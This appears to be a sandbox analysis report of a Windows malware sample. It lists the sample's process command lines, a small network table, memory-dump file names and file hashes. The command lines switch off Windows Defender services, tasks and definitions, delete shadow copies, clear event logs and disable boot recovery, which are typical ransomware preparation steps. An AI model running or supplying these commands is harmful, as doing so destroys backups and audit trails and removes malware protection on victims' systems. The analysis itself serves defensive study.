reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | time.windows.com | udp |
| US | 168.61.215.74:123 | time.windows.com | udp |
Files
memory/2792-115-0x0000000000000000-mapping.dmp
memory/3944-116-0x0000000000000000-mapping.dmp
memory/2668-117-0x0000000000000000-mapping.dmp
memory/3668-118-0x0000000000000000-mapping.dmp
memory/4044-119-0x0000000000000000-mapping.dmp
memory/3096-120-0x0000000000000000-mapping.dmp
memory/940-121-0x0000000000000000-mapping.dmp
memory/2932-122-0x0000000000000000-mapping.dmp
memory/2232-123-0x0000000000000000-mapping.dmp
memory/4020-124-0x0000000000000000-mapping.dmp
memory/3992-125-0x0000000000000000-mapping.dmp
memory/4072-126-0x0000000000000000-mapping.dmp
memory/748-127-0x0000000000000000-mapping.dmp
memory/2804-128-0x0000000000000000-mapping.dmp
memory/3408-129-0x0000000000000000-mapping.dmp
memory/1188-130-0x0000000000000000-mapping.dmp
memory/668-131-0x0000000000000000-mapping.dmp
memory/428-132-0x0000000000000000-mapping.dmp
memory/1164-133-0x0000000000000000-mapping.dmp
memory/3320-134-0x0000000000000000-mapping.dmp
memory/828-135-0x0000000000000000-mapping.dmp
memory/1040-136-0x0000000000000000-mapping.dmp
memory/1268-137-0x0000000000000000-mapping.dmp
memory/1264-138-0x0000000000000000-mapping.dmp
memory/1432-139-0x0000000000000000-mapping.dmp
memory/1788-140-0x0000000000000000-mapping.dmp
memory/1976-141-0x0000000000000000-mapping.dmp
memory/1992-142-0x0000000000000000-mapping.dmp
memory/2224-143-0x0000000000000000-mapping.dmp
memory/504-144-0x0000000000000000-mapping.dmp
memory/3540-145-0x0000000000000000-mapping.dmp
memory/2208-146-0x0000000000000000-mapping.dmp
memory/1184-147-0x0000000000000000-mapping.dmp
memory/864-148-0x0000000000000000-mapping.dmp
memory/3212-149-0x0000000000000000-mapping.dmp
memory/860-150-0x0000000000000000-mapping.dmp
memory/616-151-0x0000000000000000-mapping.dmp
memory/1368-152-0x0000000000000000-mapping.dmp
memory/2752-153-0x0000000000000000-mapping.dmp
memory/3704-154-0x0000000000000000-mapping.dmp
memory/2220-155-0x0000000000000000-mapping.dmp
memory/636-156-0x0000000000000000-mapping.dmp
memory/3700-157-0x0000000000000000-mapping.dmp
memory/868-158-0x0000000000000000-mapping.dmp
memory/1516-159-0x0000000000000000-mapping.dmp
memory/3604-160-0x0000000000000000-mapping.dmp
memory/68-161-0x0000000000000000-mapping.dmp
memory/1028-162-0x0000000000000000-mapping.dmp
memory/1116-163-0x0000000000000000-mapping.dmp
memory/796-164-0x0000000000000000-mapping.dmp
memory/1736-165-0x0000000000000000-mapping.dmp
memory/3552-166-0x0000000000000000-mapping.dmp
memory/3916-167-0x0000000000000000-mapping.dmp
memory/1568-168-0x0000000000000000-mapping.dmp
memory/2344-169-0x0000000000000000-mapping.dmp
memory/2248-170-0x0000000000000000-mapping.dmp
memory/1728-171-0x0000000000000000-mapping.dmp
memory/2252-172-0x0000000000000000-mapping.dmp
memory/1868-173-0x0000000000000000-mapping.dmp
memory/1608-174-0x0000000000000000-mapping.dmp
memory/2992-175-0x0000000000000000-mapping.dmp
memory/3692-176-0x0000000000000000-mapping.dmp
memory/2268-177-0x0000000000000000-mapping.dmp
memory/1016-178-0x0000000000000000-mapping.dmp
memory/600-180-0x0000018894170000-0x0000018894172000-memory.dmp
memory/600-179-0x0000018894170000-0x0000018894172000-memory.dmp
memory/600-181-0x0000018894170000-0x0000018894172000-memory.dmp
memory/600-182-0x0000018894170000-0x0000018894172000-memory.dmp
memory/600-183-0x0000018894170000-0x0000018894172000-memory.dmp
memory/600-184-0x00000188AC940000-0x00000188AC962000-memory.dmp
memory/600-185-0x0000018894170000-0x0000018894172000-memory.dmp
memory/600-186-0x0000018894170000-0x0000018894172000-memory.dmp
memory/600-187-0x00000188AD380000-0x00000188AD3F6000-memory.dmp
memory/600-188-0x00000188AC900000-0x00000188AC902000-memory.dmp
memory/600-189-0x00000188AC903000-0x00000188AC905000-memory.dmp
memory/600-190-0x0000018894170000-0x0000018894172000-memory.dmp
memory/600-194-0x00000188AC906000-0x00000188AC908000-memory.dmp
memory/600-215-0x0000018894170000-0x0000018894172000-memory.dmp
memory/3740-217-0x000002D05D9B0000-0x000002D05D9B2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ad5cd538ca58cb28ede39c108acb5785 |
| SHA1 | 1ae910026f3dbe90ed025e9e96ead2b5399be877 |
| SHA256 | c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033 |
| SHA512 | c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13 |
memory/3740-218-0x000002D05D9B0000-0x000002D05D9B2000-memory.dmp
memory/3740-219-0x000002D05D9B0000-0x000002D05D9B2000-memory.dmp
memory/3740-220-0x000002D05D9B0000-0x000002D05D9B2000-memory.dmp
memory/3740-221-0x000002D05D9B0000-0x000002D05D9B2000-memory.dmp
memory/3740-222-0x000002D076990000-0x000002D0769B2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a5d084db334a6d26c301896f1a6192cd |
| SHA1 | e7473be98aed125bd83a7ae55a4ed233f81866b8 |
| SHA256 | 71d0b05798f08f29c416a206c1dca915cbe433f2ad9bbc5c9ef2e98c94717905 |
| SHA512 | 8a54338cb305692dc703c982eca8036ae686b6e457068339b94314158f4f84dd085a212871d5d557c95820aa47feada9c5fe3f3340ac1db77ca90f4444282fcb |
memory/3740-224-0x000002D05D9B0000-0x000002D05D9B2000-memory.dmp
memory/3740-225-0x000002D05D9B0000-0x000002D05D9B2000-memory.dmp
memory/3740-226-0x000002D076B40000-0x000002D076BB6000-memory.dmp
memory/3740-227-0x000002D05D9B0000-0x000002D05D9B2000-memory.dmp
memory/3740-231-0x000002D05D9B0000-0x000002D05D9B2000-memory.dmp
memory/3740-232-0x000002D05D9B0000-0x000002D05D9B2000-memory.dmp
memory/3740-253-0x000002D05DA60000-0x000002D05DA62000-memory.dmp
memory/3740-254-0x000002D05DA63000-0x000002D05DA65000-memory.dmp
memory/3740-255-0x000002D05DA66000-0x000002D05DA68000-memory.dmp
memory/600-252-0x00000188AC908000-0x00000188AC909000-memory.dmp
memory/3740-257-0x000002D05DA68000-0x000002D05DA69000-memory.dmp